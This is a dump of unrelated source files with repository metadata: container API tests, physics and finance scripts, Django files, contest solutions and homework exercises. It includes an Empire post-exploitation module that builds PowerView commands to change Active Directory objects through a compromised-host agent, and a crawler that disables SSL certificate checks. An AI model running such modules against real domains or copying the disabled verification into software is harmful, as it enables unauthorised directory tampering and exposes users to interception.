        self.assertEqual(r.status_code, 204, r.text)
def test_stop_containers(self):
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_start_containers(self):
r = requests.post(_url(ctnr("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_restart_containers(self):
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/restart")), timeout=5)
self.assertEqual(r.status_code, 204, r.text)
def test_resize(self):
r = requests.post(_url(ctnr("/containers/{}/resize?h=43&w=80")))
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
self.assertIsNone(r.text)
def test_attach_containers(self):
r = requests.post(_url(ctnr("/containers/{}/attach")))
self.assertIn(r.status_code, (101, 409), r.text)
def test_logs_containers(self):
r = requests.get(_url(ctnr("/containers/{}/logs?stdout=true")))
self.assertEqual(r.status_code, 200, r.text)
def test_post_create(self):
self.skipTest("TODO: create request body")
r = requests.post(_url("/containers/create?args=True"))
self.assertEqual(r.status_code, 200, r.text)
json.loads(r.text)
def test_commit(self):
r = requests.post(_url(ctnr("/commit?container={}")))
self.assertEqual(r.status_code, 200, r.text)
self.validateObjectFields(r.text)
def test_images(self):
r = requests.get(_url("/images/json"))
self.assertEqual(r.status_code, 200, r.text)
self.validateObjectFields(r.content)
def test_inspect_image(self):
r = requests.get(_url("/images/alpine/json"))
self.assertEqual(r.status_code, 200, r.text)
obj = self.validateObjectFields(r.content)
_ = parse(obj["Created"])
def test_delete_image(self):
r = requests.delete(_url("/images/alpine?force=true"))
self.assertEqual(r.status_code, 200, r.text)
json.loads(r.text)
def test_pull(self):
r = requests.post(_url("/images/pull?reference=alpine"), timeout=5)
self.assertEqual(r.status_code, 200, r.text)
json.loads(r.text)
def test_search(self):
# Had issues with this test hanging when repositories not happy
def do_search():
r = requests.get(_url("/images/search?term=alpine"), timeout=5)
self.assertEqual(r.status_code, 200, r.text)
json.loads(r.text)
search = Process(target=do_search)
search.start()
search.join(timeout=10)
self.assertFalse(search.is_alive(), "/images/search took too long")
def test_ping(self):
r = requests.get(PODMAN_URL + "/_ping")
self.assertEqual(r.status_code, 200, r.text)
r = requests.head(PODMAN_URL + "/_ping")
self.assertEqual(r.status_code, 200, r.text)
r = requests.get(_url("/_ping"))
self.assertEqual(r.status_code, 200, r.text)
r = requests.get(_url("/_ping"))
self.assertEqual(r.status_code, 200, r.text)
def validateObjectFields(self, buffer):
objs = json.loads(buffer)
if not isinstance(objs, dict):
for o in objs:
_ = o["Id"]
else:
_ = objs["Id"]
return objs
if __name__ == "__main__":
unittest.main()
|
[
"jhonce@redhat.com"
] |
jhonce@redhat.com
|
e4d23a56aa95cac0d11bf916aabdb1ea0d1d364c
|
4dd1d8fa59e20061e2c12e540fc52b1b305e575b
|
/source/sims/s286/double-harris-ic.py
|
ba4ee31039abd673c146d855b94be5ecfb63344d
|
[
"MIT"
] |
permissive
|
ammarhakim/ammar-simjournal
|
f63521906a97d55ab290a5960d94758139944c89
|
5019f4723e20db80a20db6f2bd454c2fd3241412
|
refs/heads/master
| 2023-06-08T08:18:11.722779
| 2023-06-02T15:06:43
| 2023-06-02T15:06:43
| 204,050,516
| 3
| 3
| null | 2022-02-01T16:53:13
| 2019-08-23T18:28:44
|
Lua
|
UTF-8
|
Python
| false
| false
| 1,554
|
py
|
from pylab import *
import numpy
Lx = 100.0
Ly = 50.0
NX = 200
NY = 100
B0 = 0.1
me = 1.0
mi = me*25.0
qe = -1.0
qi = 1.0
dlambda = 1.0
n0 = 1.0
ninf = 0.2*n0
psi0 = B0
dx = Lx/NX
dy = Ly/NY
X = linspace(0.5*dx, Lx-0.5*dx, NX)
Y = linspace(0.5*dy, Ly-0.5*dy, NY)
XX, YY = meshgrid(X, Y)
Bx = numpy.zeros((NX, NY), numpy.float)
n = numpy.zeros((NX, NY), numpy.float)
dBx1 = numpy.zeros((NX, NY), numpy.float)
dBy1 = numpy.zeros((NX, NY), numpy.float)
dBx2 = numpy.zeros((NX, NY), numpy.float)
dBy2 = numpy.zeros((NX, NY), numpy.float)
for i in range(NX):
for j in range(NY):
Bx[i,j] = B0*(-1+tanh((Y[j]-Ly/4)/dlambda)-tanh((Y[j]-3*Ly/4)/dlambda))
n[i,j] = n0/cosh((Y[j]-Ly/4)/dlambda)**2+n0/cosh((Y[j]-3*Ly/4)/dlambda)**2+ninf
dBx1[i,j] = -psi0*(pi/Ly)*cos(2*pi*(X[i]-Lx/4)/Lx)*sin(pi*(Y[j]-Ly/4)/Ly)
dBy1[i,j] = psi0*(2*pi/Lx)*sin(2*pi*(X[i]-Lx/4)/Lx)*cos(pi*(Y[j]-Ly/4)/Ly)
dBx2[i,j] = -psi0*(pi/Ly)*cos(2*pi*(X[i]+Lx/4)/Lx)*sin(pi*(Y[j]+Ly/4)/Ly)
dBy2[i,j] = psi0*(2*pi/Lx)*sin(2*pi*(X[i]+Lx/4)/Lx)*cos(pi*(Y[j]+Ly/4)/Ly)
figure(1)
pcolormesh(XX, YY, transpose(Bx))
title('Bx(x,y)')
colorbar()
figure(2)
pcolormesh(XX, YY, transpose(n))
title('n(x,y)')
colorbar()
figure(3)
plot(Y, Bx[NX/2,:], 'r-')
xlabel('Y')
ylabel('Bx')
title('Bx(y)')
figure(4)
plot(Y, n[NX/2,:], 'r-')
xlabel('Y')
ylabel('n')
title('n(y)')
figure(7)
Bxt = Bx+dBx1+dBx2
Byt = dBy1+dBy2
Btot = sqrt(Bxt**2+Byt**2)
#contour(XX, YY, transpose(Btot))
streamplot(X, Y, transpose(Bxt), transpose(Byt), density=2)
show()
|
[
"11265732+ammarhakim@users.noreply.github.com"
] |
11265732+ammarhakim@users.noreply.github.com
|
f1f6ea249402b6419fc6f324019956dc69813c50
|
69633bcb719e5caa2859c30d38f0fb0ff33b05a7
|
/app/api/urls.py
|
8ab6b71db340bc097ea2d0ae7dd19e923cae9533
|
[] |
no_license
|
Zarinabonu/employee_version_2
|
e0ed3df43633241774686b7eaba01fbf2bebfa1a
|
991d8fce23d3736df0271c3ca3e380a13ab6e5c0
|
refs/heads/master
| 2022-11-26T03:22:47.067982
| 2019-12-07T08:14:36
| 2019-12-07T08:14:36
| 223,534,726
| 0
| 0
| null | 2022-11-22T04:50:39
| 2019-11-23T05:12:50
|
Python
|
UTF-8
|
Python
| false
| false
| 498
|
py
|
from django.urls import include, path
urlpatterns = [
path('group/', include('app.api.group.urls')),
path('employee/', include('app.api.employee.urls')),
path('salary/', include('app.api.salary.urls')),
path('accountant/', include('app.api.accountant.urls')),
path('attendance/', include('app.api.attendance.urls')),
path('project/', include('app.api.project.urls')),
path('task/', include('app.api.task.urls')),
path('static/', include('app.api.static.urls')),
]
|
[
"zarinabonu199924@gmail.com"
] |
zarinabonu199924@gmail.com
|
deda7c2da31cde83eeb0a317505f79f8db6fb75e
|
326c6ad82d59bb7509c02c76695ea9035993da70
|
/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py
|
2a0e745b9ae829fc42345a0a3330e60ab4217790
|
[
"BSD-3-Clause"
] |
permissive
|
Arvanaghi/Empire
|
0c08bd7ddfba9be10e96bb0834b8ce3bc829059b
|
fd168ebf8acb1c2ee59d56f2c393ebd7a297603e
|
refs/heads/master
| 2021-01-20T14:15:34.864581
| 2017-08-05T17:51:44
| 2017-08-05T17:51:44
| 99,435,848
| 2
| 0
| null | 2017-08-05T16:50:16
| 2017-08-05T16:50:16
| null |
UTF-8
|
Python
| false
| false
| 4,526
|
py
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Set-ADObject',
'Author': ['@harmj0y'],
'Description': ('Takes a SID, name, or SamAccountName to query for a specified '
'domain object, and then sets a specified "PropertyName" to a '
'specified "PropertyValue". Part of PowerView.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'SID' : {
'Description' : "The SID of the domain object you're querying for.",
'Required' : False,
'Value' : ''
},
'Name' : {
'Description' : "The name of the domain object you're querying for.",
'Required' : False,
'Value' : ''
},
'SamAccountName' : {
'Description' : "The SamAccountName of the domain object you're querying for",
'Required' : False,
'Value' : ''
},
'Domain' : {
'Description' : 'The domain to query for objects, defaults to the current domain.',
'Required' : False,
'Value' : ''
},
'PropertyName' : {
'Description' : 'The property name to set.',
'Required' : False,
'Value' : ''
},
'PropertyValue' : {
'Description' : 'The value to set for PropertyName.',
'Required' : False,
'Value' : ''
},
'PropertyXorValue' : {
'Description' : 'Integer calue to binary xor (-bxor) with the current int value.',
'Required' : False,
'Value' : ''
},
'ClearValue' : {
'Description' : 'Switch. Clear the value of PropertyName.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script += moduleName + " "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
return script
|
[
"will@harmj0y.net"
] |
will@harmj0y.net
|
b988547aeade1c42cfea0da062e3ba6a62e711c9
|
c2fb6846d5b932928854cfd194d95c79c723f04c
|
/python/coursera_python/MICHIGAN/wikicrawler/fin5.py
|
6ca16eb862d2f226ef4bed731e6432b820b1b03d
|
[
"MIT"
] |
permissive
|
Jimut123/code-backup
|
ef90ccec9fb6483bb6dae0aa6a1f1cc2b8802d59
|
8d4c16b9e960d352a7775786ea60290b29b30143
|
refs/heads/master
| 2022-12-07T04:10:59.604922
| 2021-04-28T10:22:19
| 2021-04-28T10:22:19
| 156,666,404
| 9
| 5
|
MIT
| 2022-12-02T20:27:22
| 2018-11-08T07:22:48
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,200
|
py
|
# To run this, you can install BeautifulSoup
# https://pypi.python.org/pypi/beautifulsoup4
# Or download the file
# http://www.py4e.com/code3/bs4.zip
# and unzip it in the same directory as this file
import sqlite3
conn = sqlite3.connect('wiki1.sqlite')
cur = conn.cursor()
cur.executescript('''
CREATE TABLE IF NOT EXISTS data (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
link TEXT UNIQUE
);
''')
import urllib.request, urllib.parse, urllib.error
from bs4 import BeautifulSoup
import ssl
# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url='0'
dummy = 1
next_url = '0'
i=10
#######
print("i = ",i)
while(1):
i=i+1
##########
print("i = ",i)
if dummy == 1:
url = input('Enter - ')
#######
print("url entered = ",url)
print("dummy = ",dummy)
if dummy == 0:
#######
print("dummy = ",dummy)
url = next_url
#######
print("url = ",url)
html = urllib.request.urlopen(url, context=ctx).read()
soup = BeautifulSoup(html, 'html.parser')
# Retrieve all of the anchor tags
tags = soup('a')
######
print(tags)
for tag in tags:
dummy3=0
while dummy3==0:
######
print("dummy3 = ",dummy3)
dummy3=1
try:
######
link_get = tag.get('href', None)
dummy3=1
#######
print("link_get = ",link_get)
print("dummy3 = ",1)
except ValueError:
link_get = cur.execute(''' SELECT link FROM data where id = ?''',(i,))
#######
print("link_get = ",link_get)
i=i-1
#######
print("i = ",i)
#html = urllib.request.urlopen(url, context=ctx).read()
#soup = BeautifulSoup(html, 'html.parser')
#tags = soup('a')
#i=i+1
########
print(link_get)
while(link_get == None):
########
print(link_get)
if link_get == None:
i=i-1
link_get = cur.execute(''' SELECT link FROM data where id = ?''',(i,))
#####
print("Entered here !! safe !!")
print(link_get)
while 'https:' not in link_get:
try :
if 'https:' in link_get:
print(link_get," no https: protocol changing mode");
except ValueError:
link_get = cur.execute(''' SELECT link FROM data where id = ?''',(i,))
print("link_get = ",link_get)
i=i-1
print("i = ",i)
if 'https:' in link_get:
i=i+1
print("link_get = ",link_get,"i = ",i )
if 'https:' in link_get:
next_url = link_get
print("next_url = ", next_url)
k=0
while k==0:
i=i-1
print("i = ",i)
try:
url = next_url
print("next_url : ",next_url)
print("url : ",url)
html = urllib.request.urlopen(url, context=ctx).read()
print(html)
soup = BeautifulSoup(html, 'html.parser')
print(soup)
tags = soup('a')
print(tags)
k=1
except:
url = cur.execute(''' SELECT link FROM data where id = ?''',(i,))
print(next_url," == is not valid")
print("====================================")
cur.execute('''INSERT OR IGNORE INTO data (link)
VALUES ( ? )''', ( link_get, ) )
#i=150
if(i%10 == 0):
conn.commit()
dummy = 0
conn.commit()
|
[
"jimutbahanpal@yahoo.com"
] |
jimutbahanpal@yahoo.com
|
fa8309731559f5f28c23907d10d8809df78cf6ea
|
7142c3941481e661075154d714a29d5e283a3074
|
/KeywordArguments.py
|
7238526401ef054445d4af584ad76d295e46f26a
|
[] |
no_license
|
nirajan5/Demo
|
5642a9669fedcca47b0304ac423c0b3e6333b8e2
|
2451875bf5698cd38af69baa117c14099951bc9f
|
refs/heads/master
| 2023-07-27T17:04:03.689673
| 2021-09-15T11:14:25
| 2021-09-15T11:14:25
| 406,732,005
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 279
|
py
|
# function func is called with the name and message as the keyword arguments
def func(name, message):
print("printing the message with", name, "and ", message)
# name and message is copied with the values Mike and hello respectively
func(name="Mike", message="hello")
|
[
"jhanirajan5@gmail.com"
] |
jhanirajan5@gmail.com
|
baf79214692455db57861792b2f1ca24f8f899e9
|
7d8022661a756f77f715ee4d099fb17cb9da671a
|
/feature/zoo/Skewness_Daily.py
|
65ff2a7ce6ebc641dccfe4e1a9bbef343ece64da
|
[] |
no_license
|
lxj0276/Quant-Util
|
a7d70d88fc47eb16a08149faefa7b128c01c670e
|
2706ecba72a293ee01105ad22508a8d6b20e1394
|
refs/heads/master
| 2020-04-25T13:40:36.700892
| 2018-10-15T04:35:54
| 2018-10-15T04:35:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 609
|
py
|
from feature.base import NonPersistentFeature
from feature.ops import *
from feature.zoo.ChangeRate_Daily import ChangeRate_Daily
class Skewness_Daily(NonPersistentFeature):
description = '个股历史22日收益率的偏度'
formula = 'Skewness = E[(R)^3], R=(r-mu)/sigma '
granularity = 'day'
def _create_feature(self, instrument_id, time_range):
def get_skewness(x):
neu_x = ((x - nanmean(x)) / nanstd(x)) ** 3
return nanmean(neu_x)
skewness = Rolling(ChangeRate_Daily(), 22, get_skewness)
return skewness.load(instrument_id, time_range)
|
[
"zhangzc@pku.edu.cn"
] |
zhangzc@pku.edu.cn
|
42d4e14bfa94bd62f6a98bae988d6c52e6d4f11d
|
12139fb270a099b01e4d68ce66aa7482f9eed189
|
/backend/delivery_order/migrations/0001_initial.py
|
b001253df4ca0fca357aab50cc409aed84cd07ea
|
[] |
no_license
|
crowdbotics-apps/himi2-25342
|
610a85cba7221f3412de3ee3e00af182b9cb2fd4
|
ba9c7c90e42984b26d234a281ea50f2738b2146f
|
refs/heads/master
| 2023-04-03T05:05:43.969021
| 2021-03-29T13:35:53
| 2021-03-29T13:35:53
| 352,651,097
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,609
|
py
|
# Generated by Django 2.2.19 on 2021-03-29 13:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('delivery_user_profile', '0001_initial'),
('menu', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Bill',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('total_amount', models.FloatField()),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('contact_info', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='bill_contact_info', to='delivery_user_profile.ContactInfo')),
('profile', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='bill_profile', to='delivery_user_profile.Profile')),
],
),
migrations.CreateModel(
name='PaymentMethod',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('detail', models.TextField()),
],
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.IntegerField()),
('total_price', models.FloatField()),
('status', models.CharField(max_length=20)),
('notes', models.TextField()),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('bill', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='order_bill', to='delivery_order.Bill')),
('item_variant', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='order_item_variant', to='menu.ItemVariant')),
('payment_method', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='order_payment_method', to='delivery_order.PaymentMethod')),
('profile', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='order_profile', to='delivery_user_profile.Profile')),
],
),
]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
f22e0886db6f9382a5e20f45bcfbf625ccc3c4b8
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/arc076/B/3550700.py
|
8f96f6d28852e7726701218eb446f377441ebaf7
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,186
|
py
|
# -*- coding: utf-8 -*-
n = int(input())
ax = []
ay = []
for i in range(n):
x,y = map(int, input().split())
ax.append((x,i))
ay.append((y,i))
ax.sort()
ay.sort()
edge = []
for i in range(n-1):
v = ax[i][1]
u = ax[i+1][1]
c = abs(ax[i][0]-ax[i+1][0])
edge.append((c,v,u))
v = ay[i][1]
u = ay[i+1][1]
c = abs(ay[i][0]-ay[i+1][0])
edge.append((c,v,u))
edge.sort()
class UnionFind():
def __init__(self, n):
self.par = [i for i in range(n)]
def find(self, x):
if self.par[x] == x:
return x
else:
self.par[x] = self.find(self.par[x])
return self.par[x]
def unite(self, x, y):
x = self.find(x)
y = self.find(y)
if x==y:
return
if x<y:
self.par[y] = x
else:
self.par[x] = y
def same(self, x, y):
return self.find(x) == self.find(y)
t = UnionFind(n)
res = 0
for e in edge:
cost = e[0]
v = e[1]
u = e[2]
if not t.same(v,u):
# print((v,u,cost))
t.unite(v,u)
res += cost
print(res)
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
a7bdf555c5c6d3f96279b3733f29b9c8b469e4e2
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/abc114/C/4911470.py
|
7120757865868e9a23be1abac95852d41aafe750
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
n=int(input())
import bisect
import itertools
l=len(str(n))
ans=[]
num=[]
x=['3', '5', '7']
for k in range(3,l+1):
m=list(itertools.product(x, repeat=k))
num.extend(m)
for i in range(len(num)):
y=num[i]
if '3' in y and '5' in y and '7' in y:
number=''
for j in range(len(y)):
number+=y[j]
ans.append(int(number))
ans.sort()
print(bisect.bisect_right(ans, n))
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
4bfae37ee37f293153a442a5301b4ea1d1887493
|
7cd0b68c088bf8d42e048c3e4c2b3428a914b988
|
/mk-ckeck-ints-py2.py
|
b5e236d2cf8f7ab5e2b24ee8432412a594fb0cd9
|
[
"Apache-2.0"
] |
permissive
|
mykespb/pythoner
|
9603904be46298f52ce54f7e421889e6d88b1c8e
|
5049b20018890d18d9fd8076ad13f176e1f037e3
|
refs/heads/master
| 2023-07-26T07:17:42.848231
| 2023-07-23T19:30:20
| 2023-07-23T19:30:20
| 42,587,225
| 1
| 0
|
Apache-2.0
| 2022-07-06T21:09:43
| 2015-09-16T12:59:54
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,741
|
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# mk-check-ints.py (c) myke 2015-11-07
# check first integer predefined refs
for i in range (-10, 300):
a = i+0
b = i+0
if a is b:
print i, "equals"
else:
print i, "not equals"
-10 not equals
-9 not equals
-8 not equals
-7 not equals
-6 not equals
-5 equals
-4 equals
-3 equals
-2 equals
-1 equals
0 equals
1 equals
2 equals
3 equals
4 equals
5 equals
6 equals
7 equals
8 equals
9 equals
10 equals
11 equals
12 equals
13 equals
14 equals
15 equals
16 equals
17 equals
18 equals
19 equals
20 equals
21 equals
22 equals
23 equals
24 equals
25 equals
26 equals
27 equals
28 equals
29 equals
30 equals
31 equals
32 equals
33 equals
34 equals
35 equals
36 equals
37 equals
38 equals
39 equals
40 equals
41 equals
42 equals
43 equals
44 equals
45 equals
46 equals
47 equals
48 equals
49 equals
50 equals
51 equals
52 equals
53 equals
54 equals
55 equals
56 equals
57 equals
58 equals
59 equals
60 equals
61 equals
62 equals
63 equals
64 equals
65 equals
66 equals
67 equals
68 equals
69 equals
70 equals
71 equals
72 equals
73 equals
74 equals
75 equals
76 equals
77 equals
78 equals
79 equals
80 equals
81 equals
82 equals
83 equals
84 equals
85 equals
86 equals
87 equals
88 equals
89 equals
90 equals
91 equals
92 equals
93 equals
94 equals
95 equals
96 equals
97 equals
98 equals
99 equals
100 equals
101 equals
102 equals
103 equals
104 equals
105 equals
106 equals
107 equals
108 equals
109 equals
110 equals
111 equals
112 equals
113 equals
114 equals
115 equals
116 equals
117 equals
118 equals
119 equals
120 equals
121 equals
122 equals
123 equals
124 equals
125 equals
126 equals
127 equals
128 equals
129 equals
130 equals
131 equals
132 equals
133 equals
134 equals
135 equals
136 equals
137 equals
138 equals
139 equals
140 equals
141 equals
142 equals
143 equals
144 equals
145 equals
146 equals
147 equals
148 equals
149 equals
150 equals
151 equals
152 equals
153 equals
154 equals
155 equals
156 equals
157 equals
158 equals
159 equals
160 equals
161 equals
162 equals
163 equals
164 equals
165 equals
166 equals
167 equals
168 equals
169 equals
170 equals
171 equals
172 equals
173 equals
174 equals
175 equals
176 equals
177 equals
178 equals
179 equals
180 equals
181 equals
182 equals
183 equals
184 equals
185 equals
186 equals
187 equals
188 equals
189 equals
190 equals
191 equals
192 equals
193 equals
194 equals
195 equals
196 equals
197 equals
198 equals
199 equals
200 equals
201 equals
202 equals
203 equals
204 equals
205 equals
206 equals
207 equals
208 equals
209 equals
210 equals
211 equals
212 equals
213 equals
214 equals
215 equals
216 equals
217 equals
218 equals
219 equals
220 equals
221 equals
222 equals
223 equals
224 equals
225 equals
226 equals
227 equals
228 equals
229 equals
230 equals
231 equals
232 equals
233 equals
234 equals
235 equals
236 equals
237 equals
238 equals
239 equals
240 equals
241 equals
242 equals
243 equals
244 equals
245 equals
246 equals
247 equals
248 equals
249 equals
250 equals
251 equals
252 equals
253 equals
254 equals
255 equals
256 equals
257 not equals
258 not equals
259 not equals
260 not equals
261 not equals
262 not equals
263 not equals
264 not equals
265 not equals
266 not equals
267 not equals
268 not equals
269 not equals
270 not equals
271 not equals
272 not equals
273 not equals
274 not equals
275 not equals
276 not equals
277 not equals
278 not equals
279 not equals
280 not equals
281 not equals
282 not equals
283 not equals
284 not equals
285 not equals
286 not equals
287 not equals
288 not equals
289 not equals
290 not equals
291 not equals
292 not equals
293 not equals
294 not equals
295 not equals
296 not equals
297 not equals
298 not equals
299 not equals
|
[
"mykespb@gmail.com"
] |
mykespb@gmail.com
|
781480b6b7c9c10bf5e38599c8db5a2b48975330
|
4e3eedbf46a032c42665c3b212a48bc30652c1ed
|
/day09/03 作业.py
|
0f6da2b7095362708f20d35f0057463e18209925
|
[] |
no_license
|
zranguai/python-learning
|
7eb2a842f6f4624f550ee1c4ff7cd64ac948097a
|
acf19c9f85eec4bee3e3e3a00712c4a53aa9d249
|
refs/heads/master
| 2023-03-24T14:36:32.248437
| 2021-03-15T08:24:01
| 2021-03-15T08:24:01
| 347,874,326
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,475
|
py
|
#
# 1.整理函数相关知识点,写博客。
#
# 2.写函数,检查获取传入列表或元组对象的所有奇数位索引对应的元素,并将其作为新列表返回给调用者。
# def odd_element(li):
# l1 = li[1::2]
# return l1
#
#
# l2 = [1, 2, 3, 6, 5, 8]
# tu2 = (1, 2, 3, 6, 5, 8)
# res = odd_element(l2)
# res1 = odd_element(tu2)
# print(res)
# print(res1)
# 3.写函数,判断用户传入的对象(字符串、列表、元组)长度是否大于5。
# def judge_length(li):
# if len(li) > 5:
# return True
# else:
# return False
#
#
# print(judge_length('askdhajdaj'))
# print(judge_length([1, 2, 3, 5]))
# print(judge_length((1, 2, 3, 5, 6, 9)))
# 4.写函数,检查传入列表的长度,如果大于2,那么仅保留前两个长度的内容,并将新内容返回给调用者。
# def check_length(li):
# return li[0:2] if len(li) > 2 else False
#
#
# print(check_length([1, 2, 3, 6, 8]))
# print(check_length([18]))
# 5.写函数,计算传入函数的字符串中,[数字]、[字母] 以及 [其他]的个数,并返回结果。
# s1 = '256aasdf582中文学习'
# i.isalpha不能判断中英文
# def foo(s):
# num1 = 0
# s1 = 0
# other = 0
# for i in s:
# if i.isdigit():
# num1 += 1
# elif i.encode('utf-8').isalpha():
# s1 += 1
# else:
# other += 1
# return num1, s1, other
#
#
# res = foo('256aasdf582中文k学习')
# print(res)
# 6.写函数,接收两个数字参数,返回比较大的那个数字。
# def foo(num1, num2):
# return num1 if num1 > num2 else num2
#
#
# print(foo(53, 23))
# print(foo(0, 23))
# 7.写函数,检查传入字典的每一个value的长度,如果大于2,那么仅保留前两个长度的内容,并将新内容返回给调用者。
# dic = {"k1": "v1v1", "k2": [11,22,33,44]} {"k1": "v1", "k2": [11,22]}
# PS:字典中的value只能是字符串或列表
# dic = {"k1": "v1v1", "k2": [11, 22, 33, 44]}
# def foo(dic):
# dic1 = {}
# for i in dic.keys():
# if len(dic[i]) > 2:
# dic1[i] = dic[i][0:2]
# return dic1
#
#
# print(foo(dic))
# 8.写函数,此函数只接收一个参数且此参数必须是列表数据类型,此函数完成的功能是返回给调用者一个字典,
# 此字典的键值对为此列表的索引及对应的元素。例如传入的列表为:[11,22,33] 返回的字典为 {0:11,1:22,2:33}。
# l1 = [11, 22, 33, 44, 25]
# def foo(l1):
# dic = {}
# for index in range(len(l1)):
# dic[index] = l1[index]
# return dic
#
#
# print(foo(l1))
# 9.写函数,函数接收四个参数分别是:姓名,性别,年龄,学历。
# 用户通过输入这四个内容,然后将这四个内容传入到函数中,此函数接收到这四个内容,将内容追加到一个student_msg文件中。
# def foo(name, sex, age, edu):
# s1 = '姓名是:{},性别是:{},年龄是:{},学历是:{}\n'.format(name, sex, age, edu)
# with open('student_msg', mode='a', encoding='utf-8') as f:
# f.write(s1)
#
#
# foo('小明', '男', 23, '本科')
# foo('小红', '女', 21, '专科')
# 10.对第9题升级:支持用户持续输入,Q或者q退出,性别默认为男,如果遇到女学生,则把性别输入女。
# 用户持续输入: while input
# # 函数:接收四个参数。将四个参数追加到文件中。
# def foo(name, age, edu, sex='男'):
# s1 = '姓名是:{},性别是:{},年龄是:{},学历是:{}\n'.format(name, sex, age, edu)
# with open('student_msg', mode='a', encoding='utf-8') as f:
# f.write(s1)
#
#
# while True:
# if input('输入q/Q退出,输入其他继续').upper() == 'Q':
# break
# name = input('请输入姓名')
# sex = input('请输入性别')
# age = input('请输入年龄')
# edu = input('请输入学历')
# foo(name, age, edu, sex)
# 写函数,用户传入修改的文件名,与要修改的内容,执行函数,完成整个文件的批量修改操作(选做题)。
#
# import os
# def foo(name, change):
# with open(name, mode='r', encoding='utf-8') as f1, \
# open(name + '.bak', mode='w', encoding='utf-8') as f2:
# old_content = f1.read()
# new_content = old_content.replace('SB', change)
# f2.write(new_content)
# os.remove(name)
# os.rename(name + '.bak', name)
#
# foo('student_msg', 'alexxx')
|
[
"zranguai@gmail.com"
] |
zranguai@gmail.com
|
55c0ddc10dfebaabc5ebad6bab71d2634378ec9e
|
887811408e187da2422900a31859925d59d4d6ec
|
/UniquePaths.py
|
5e5e9cbb532d75cf1af78435b7bb02a6042e8d8b
|
[] |
no_license
|
